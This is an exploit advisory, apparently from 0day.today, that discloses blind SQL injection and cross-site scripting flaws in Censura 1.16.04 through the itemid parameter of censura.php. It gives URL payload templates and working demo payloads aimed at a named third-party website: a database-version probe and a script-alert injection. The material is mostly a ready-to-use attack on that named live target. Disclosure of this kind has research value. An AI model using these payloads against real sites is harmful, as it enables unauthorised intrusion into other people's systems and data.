id: 5484
date: 07/11/2009
title: Censura 1.16.04 (bSQL/XSS) Multiple Remote Vulnerabilities
author: Vrs-hCk
cves: 

==========================================================
Censura 1.16.04 (bSQL/XSS) Multiple Remote Vulnerabilities
==========================================================


================================================================================================

 Title    : (Blind SQL/XSS) Multiple Remote Vulnerabilities
 Software : Censura v1.16.04
 Vendor   : http://www.censura.info/
 
 Date     : 12 July 2009 (Indonesia)
 Author   : Vrs-hCk

 ================================================================================================

 [-] Exploit

     http://[site]/[path]/censura.php?cmd=details&itemid=[bSQL]
     http://[site]/[path]/censura.php?cmd=details&itemid=[XSS]

 [-] Demo

     http://www.yoozreviews.com/censura.php?cmd=details&itemid=61 and substring(@@version,1,1)=4
     http://www.yoozreviews.com/censura.php?cmd=details&itemid=<script>alert(123)</script>

 ================================================================================================



#  0day.today [2023-03-27]  #